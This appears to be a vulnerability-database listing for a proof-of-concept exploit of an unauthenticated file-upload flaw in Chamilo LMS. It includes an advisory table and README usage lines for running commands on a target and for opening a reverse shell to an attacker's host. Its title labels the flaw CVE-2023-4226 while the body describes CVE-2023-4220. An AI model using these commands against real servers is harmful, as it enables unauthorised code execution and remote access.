CVE-2023-4226 PoC — Chamilo LMS 安全漏洞

Source

Associated Vulnerability

Description

POC for CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution

Readme

# CVE-2023-4220 POC

More about CVE-2023-4220: [StarLabs Advisory](https://starlabs.sg/advisories/23/23-4220/)

## Summary

| **Product**              | Chamilo                                                                                                                                                                                                                                                                                     |
| ------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **Vendor**               | Chamilo                                                                                                                                                                                                                                                                                     |
| **Severity**             | High - Adversaries may exploit software vulnerabilities to obtain unauthenticated remote code execution.                                                                                                                                                                                    |
| **Affected Versions**    | <= v1.11.24                                                                                                                                                                                                                                                                                 |
| **Tested Versions**      | v1.11.24 (latest version as of writing)                                                                                                                                                                                                                                                     |
| **CVE Identifier**       | CVE-2023-4220                                                                                                                                                                                                                                                                               |
| **CVE Description**      | Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. |
| **CWE Classification**   | CWE-434: Unrestricted Upload of File with Dangerous Type                                                                                                                                                                                                                                    |
| **CAPEC Classification** | CAPEC-650: Upload a Web Shell to a Web Server                                                                                                                                                                                                                                               |

## Proof of Concept (PoC)

### Execute Commands Directly

To execute commands directly, use the following command:

`python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami`

### Obtain a Reverse Shell

To obtain a reverse shell, use the following command:

`python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>`

File Snapshot

 [4.0K]  /data/pocs/6d6e7424f445e1c1bb85da4278844198fbfb33f2
├── [2.1K]  CVE-2023-4226.py
└── [3.6K]  README.md

0 directories, 2 files

Remarks